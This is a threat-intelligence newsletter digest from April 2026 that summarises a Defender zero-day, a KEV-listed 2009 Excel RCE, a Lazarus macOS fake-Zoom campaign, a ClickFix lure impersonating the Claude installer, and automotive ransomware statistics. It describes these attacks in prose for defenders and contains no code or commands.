Afternoon Update — 2026-04-16 — the threat gazette

Microsoft Defender Zero-Day and 17-Year-Old Excel RCE (CVE-2009-0238) Both Hit KEV

CVE-2009-0238 CVE-2026-26151 CVE-2026-33825 APT29 APT41 Evilnum Hunters International LockBit Qilin UNC1069 UNC2465 Chaos ConnectWise EVILNUM Qilin SMOKEDHAM SynAck UPPERCUT jRAT

This THN bulletin aggregates multiple distinct threat vectors, the most analytically striking of which is CVE-2009-0238 — a Microsoft Office Excel RCE from 2009 now confirmed in KEV with a due date of April 28, 2026, and an EPSS of 0.57, indicating active exploitation at material scale. The Defender zero-day (likely CVE-2026-26151 or CVE-2026-33825, both unpopulated in CVE intel — consistent with very recent assignment) warrants direct review of the bulletin, as a bypass of the primary endpoint protection layer is a force-multiplier for any concurrent campaign. SonicWall brute-force activity rounds out the edge-device exposure picture. The actor breadth — APT29, APT41, LockBit, Qilin, UNC1069, UNC2465, Evilnum, Hunters International — reflects the roundup format rather than a single coordinated campaign, but each thread carries independent operational weight.

CVE-2009-0238 entering KEV in 2026 is the sleeper signal here: a 17-year-old Excel parsing bug with EPSS approaching 0.58 implies a threat actor is actively working the document-delivery vector against organizations still ingesting untrusted Office files — which describes most of the enterprise. The Defender zero-day is the more acute concern operationally, but without populated CVE intel for the 2026 CVEs, severity and patch status require direct bulletin review. Qilin's listing here is consistent with their appearance in the automotive ransomware report (story 5233).

CVE-2009-0238 reaching KEV in 2026 with EPSS approaching 0.58 is the second data point in two days for yesterday's NVD/scoring-mismatch editorial — Thursday's observation that ancient Excel bugs are quietly being operationalized didn't have to wait long for confirmation. The Defender bypass is the acute operational item and warrants direct bulletin review given the CVE intel gap; the roundup format here carries more weight than usual because the underlying signal is coherent.

Editorial

The headline item for this readership is Microsoft's Sapphire Sleet (Lazarus) dissection: a macOS intrusion chain explicitly aimed at cryptocurrency and finance staff, using zero CVEs and a fake Zoom update that coaxes the user into clearing Gatekeeper themselves. This is the macOS expression of the trust-layer theme we've been tracking all week — attackers have stopped trying to defeat platform controls and are instead walking users through consenting past them, which means macOS fleet posture for treasury, markets, and digital-asset roles now needs the same social-engineering assumptions we already make for Windows. Rapid7's ClickFix campaign impersonating the Claude AI installer is the developer-class complement to the same mechanic: different lure, identical premise, and another data point that AI-consumer tooling is now fully absorbed into the phishing surface alongside the HuggingFace/LLM-proxy platform abuse from yesterday.

Halcyon's automotive numbers — Scattered Spider, Akira, Qilin, and BlackSuit responsible for 44% of sector ransomware — are not a sector story; they are a cross-sector actor-overlap story, because that is precisely the cohort running the Salesforce, SSO, and help-desk playbooks against financial services. Treat the automotive TTPs as early warning for our own IR runbooks rather than adjacent-industry color. Meanwhile the Defender zero-day landing in the same THN bulletin as a 17-year-old Excel RCE (CVE-2009-0238, freshly KEV-listed) is the second data point this week for the scoring-architecture thread — temporally incoherent exploitation is the steady state now, and any triage that still implicitly privileges "recent" is quietly miscalibrated against what's actually being used.

Notable

Malware

Microsoft Dissects Sapphire Sleet macOS Chain: Finance-Targeted, Zero CVEs, User-Assisted Execution

Lazarus Group LookBack

Microsoft Threat Intelligence has published a 5,600-word technical dissection of a Sapphire Sleet (Lazarus Group) macOS campaign that deliberately avoids software exploitation in favor of user-assisted execution — the attack impersonates a legitimate software update (specifically a fake Zoom update, per secondary coverage in story 5311) to induce victims into manually running malicious files, bypassing macOS Gatekeeper and notarization controls by design. The campaign explicitly targets high-value individuals and organizations in cryptocurrency, digital assets, and finance, collecting credentials, crypto wallet contents, and personal data. IOCs are available in the primary report. The same campaign is summarized in secondary coverage at stories 5310 and 5311.

The deliberate absence of CVE-based exploitation is the defining characteristic here — this campaign is specifically engineered to evade endpoint detection that monitors for process exploitation chains, shellcode injection, and memory anomalies, shifting the detection surface to user behavior analytics and anomalous process trees spawned from user-executed binaries. Financial institutions with employees active in digital asset markets are within the explicit target demographic, and the Zoom lure has high social plausibility in that population.

Continues this week's trust-layer thread — session and credential theft without CVE use, engineered so the endpoint never sees an exploitation chain to flag. Pair user-awareness messaging with this morning's trojanized-Slack story (5089); both rely on authenticated users voluntarily executing trusted-looking binaries, and the detection surface for both shifts to behavioral analytics and anomalous process trees under user-launched installers.

Ransomware

Scattered Spider, Akira, Qilin, BlackSuit Drive 44% of Automotive Ransomware

Akira BlackSuit Qilin Scattered Spider Akira Qilin

Halcyon's sector analysis places four ransomware operators — Scattered Spider, Akira, BlackSuit, and Qilin — at 44% of observed automotive industry attacks, documenting a meaningful targeting concentration in critical manufacturing. The automotive vertical's OT/IT convergence, high-value supply chain interdependencies, and production-continuity pressure create coercion dynamics structurally analogous to financial services. Qilin's presence here is consistent with their concurrent KEV-adjacent activity documented in story 5180.

The directional read for financial services is that this actor set — particularly Scattered Spider, which has documented financial sector targeting and mature social engineering TTPs including helpdesk vishing and SIM swapping — does not treat automotive as an exclusive vertical. The 44% concentration figure carries Halcyon's sampling bias, but the actor composition is independently corroborated across multiple sources and should not be discounted on that basis.

Halcyon's vertical framing obscures the cross-sector read: Scattered Spider in particular does not silo by industry, and their helpdesk-vishing / SIM-swap / SSO-token-theft TTPs map directly onto financial services. Qilin also surfaces in today's story 5180 cluster. Discount the 44% for Halcyon's sampling bias; don't discount the actor composition.

Social Engineering

ClickFix Campaign Impersonates Claude AI Installer to Land mshta/PowerShell/Injection Chain

T1027.010 T1027.013 T1055 T1059.001 T1218.005 cmd

Rapid7's MDR team observed a ClickFix campaign impersonating the Claude AI installer to deliver malware via mshta.exe (T1218.005), PowerShell (T1059.001), process injection (T1055), and two obfuscation techniques (T1027.010 command obfuscation, T1027.013 encoded file). The ClickFix social engineering pre-stage — presenting a fake error that prompts the victim to manually paste and execute a malicious command — bypasses Mark-of-the-Web protections and download-time AV scanning entirely. No attribution to a named threat actor. IOCs are available.

The Claude impersonation is tactically deliberate: Claude's user base skews technical and developer-class, representing targets with elevated system access and broad credential scope. Rapid7's characterization of the campaign as 'small' suggests either targeted deployment against a specific cohort or early-stage capability testing before wider rollout. The technique set is competent but not novel; the social engineering layer is the operational differentiator.

The AI-brand lure is the novel layer, not the delivery chain — ClickFix's Mark-of-the-Web bypass is by now table stakes. Rapid7's 'small' characterization reads as targeted early-stage deployment against a technical cohort with elevated credentials; expect AI-vendor impersonation to mature into a phishing staple alongside the usual Microsoft/Adobe/DocuSign rotation.

Briefs

Vulnerabilities

Google Cloud Extends regreSSHion (CVE-2024-6387) Advisory to Serverless VPC Access

Google Cloud Platform SSH vulnerability with publicly available exploitation code; prior advisory supplemented with updated scope and detection methodologies.

CVE-2024-6387

AI Threats

Mandiant Think Piece on AI-Accelerated Vulnerability Discovery — No New Operational Intel

Prior analysis updated with escalation signals including exploitation confirmation, patch advisory updates, scope expansion, detection artifacts, and mass exploitation patterns.

Credentials

Decipher Secondary Coverage of Sapphire Sleet macOS Campaign

Lazarus Group deployment of novel macOS malware targets users through social engineering for credential theft, with detection signatures and IOC data available.

Lazarus Group

Malware

The Register on Sapphire Sleet Fake Zoom Lure (APT3 Attribution Is an Extraction Error)

State-sponsored APT3 and Lazarus Group conduct coordinated macOS intrusions combining malware and social engineering with geopolitical implications.

APT3 Lazarus Group

Vulnerabilities

Ninja Forms File Upload Plugin (CVE-2026-0740) Under Active Exploitation; EPSS Lags Reality

WordPress Ninja Forms plugin targeted by active exploitation of file upload vulnerability; limited scope to plugin deployments with available IOC detection.

CVE-2026-0740 Ninja

Supply Chain

Talos Q1 2026 Vulnerability Pulse Characterizes Quarter as Supply-Chain-Dominated

Quarterly vendor analysis of vulnerability trends and supply chain impact during first quarter.

PlugX

Vulnerabilities

Dell PowerScale OneFS DoS Patch (CVE-2025-43935)

Vendor patch addresses denial of service condition in Dell PowerScale OneFS up to version 9.12.0.0 without exploitation evidence.

CVE-2025-43935

Vulnerabilities

Dell PowerScale OneFS Condition-Handling Patch (CVE-2025-43883)

Dell PowerScale OneFS patched for unusual condition handling vulnerability without exploitation evidence.

CVE-2025-43883

Vulnerabilities

Dell PowerScale OneFS Log-Handling Patch (CVE-2025-43937)

Dell PowerScale OneFS log file handling vulnerability addressed in security advisory without exploitation evidence.

CVE-2025-43937

Vulnerabilities

Wordfence Weekly WordPress Vulnerability Roundup (April 6–12)

Weekly summary of 153 WordPress plugin vulnerabilities with maximum EPSS of 0.057, indicating minimal exploitation risk.

CVE-2025-14732 CVE-2025-14944 CVE-2025-15611 CVE-2025-1794 CVE-2026-0740 CVE-2026-0811 CVE-2026-0814 CVE-2026-1263 CVE-2026-1396 CVE-2026-1672 CVE-2026-1673 CVE-2026-1830 CVE-2026-1865 CVE-2026-1900 CVE-2026-1924 CVE-2026-2263 CVE-2026-2305 CVE-2026-2481 CVE-2026-2509 CVE-2026-2519 CVE-2026-2712 CVE-2026-2838 CVE-2026-2942 CVE-2026-2988 CVE-2026-3005 CVE-2026-3142 CVE-2026-3177 CVE-2026-3239 CVE-2026-3243 CVE-2026-3296 CVE-2026-3311 CVE-2026-3358 CVE-2026-3360 CVE-2026-3371 CVE-2026-3396 CVE-2026-3477 CVE-2026-3480 CVE-2026-34885 CVE-2026-34888 CVE-2026-34891 CVE-2026-34893 CVE-2026-34894 CVE-2026-34895 CVE-2026-34896 CVE-2026-34897 CVE-2026-34898 CVE-2026-34899 CVE-2026-34901 CVE-2026-34902 CVE-2026-34903 CVE-2026-34904 CVE-2026-3498 CVE-2026-3499 CVE-2026-3513 CVE-2026-3535 CVE-2026-3568 CVE-2026-3574 CVE-2026-3594 CVE-2026-3600 CVE-2026-3618 CVE-2026-3646 CVE-2026-3781 CVE-2026-39432 CVE-2026-39433 CVE-2026-39434 CVE-2026-39470 CVE-2026-39480 CVE-2026-39492 CVE-2026-39493 CVE-2026-39502 CVE-2026-39519 CVE-2026-39522 CVE-2026-39523 CVE-2026-39524 CVE-2026-39533 CVE-2026-39534 CVE-2026-39537 CVE-2026-39539 CVE-2026-39545 CVE-2026-39546 CVE-2026-39547 CVE-2026-39549 CVE-2026-39550 CVE-2026-39551 CVE-2026-39552 CVE-2026-39553 CVE-2026-39554 CVE-2026-39555 CVE-2026-39556 CVE-2026-39557 CVE-2026-39558 CVE-2026-39559 CVE-2026-39560 CVE-2026-39567 CVE-2026-39568 CVE-2026-39573 CVE-2026-39576 CVE-2026-39577 CVE-2026-39578 CVE-2026-39580 CVE-2026-39582 CVE-2026-39583 CVE-2026-39587 CVE-2026-39591 CVE-2026-39596 CVE-2026-4003 CVE-2026-4025 CVE-2026-4057 CVE-2026-4065 CVE-2026-4073 CVE-2026-4079 CVE-2026-4124 CVE-2026-4141 CVE-2026-4162 CVE-2026-4299 CVE-2026-4300 CVE-2026-4303 CVE-2026-4305 CVE-2026-4326 CVE-2026-4330 CVE-2026-4333 CVE-2026-4336 CVE-2026-4341 CVE-2026-4351 CVE-2026-4379 CVE-2026-4394 CVE-2026-4401 CVE-2026-4406 CVE-2026-4429 CVE-2026-4654 CVE-2026-4655 CVE-2026-4664 CVE-2026-4785 CVE-2026-4808 CVE-2026-4871 CVE-2026-4895 CVE-2026-4977 CVE-2026-4979 CVE-2026-5144 CVE-2026-5167 CVE-2026-5169 CVE-2026-5207 CVE-2026-5217 CVE-2026-5226 CVE-2026-5357 CVE-2026-5436 CVE-2026-5465 CVE-2026-5506 CVE-2026-5508 CVE-2026-5711 CVE-2026-5742 CVE-2026-5809 CVE-2026-6443 CALENDAR More_eggs Mori Ninja Royal Sakula

DDoS

European Police Contact 75,000 Suspected Lorenz DDoS Participants

European law enforcement contacts 75,000 individuals suspected of participating in DDoS attacks coordinated by Lorenz group.

Lorenz

Ransomware

Cookeville Medical Center Discloses July 2025 Rhysida/Vice Society Ransomware Breach

Healthcare facility notifies patients of July 2025 ransomware attack attributed to Rhysida and Vice Society threat actors.

Rhysida Vice Society Attor

Supply Chain

Unattributed Sophisticated Remote Access Campaigns Targeting Cargo Sector

Researchers document sophisticated remote access intrusion campaigns targeting cargo and logistics sector without clear threat actor attribution.

ConnectWise

Supply Chain

VirusTotal Research on AI-Agent Integration for Malware Analysis

Vendor research exploring malware analysis platform integration with AI agent-based security systems.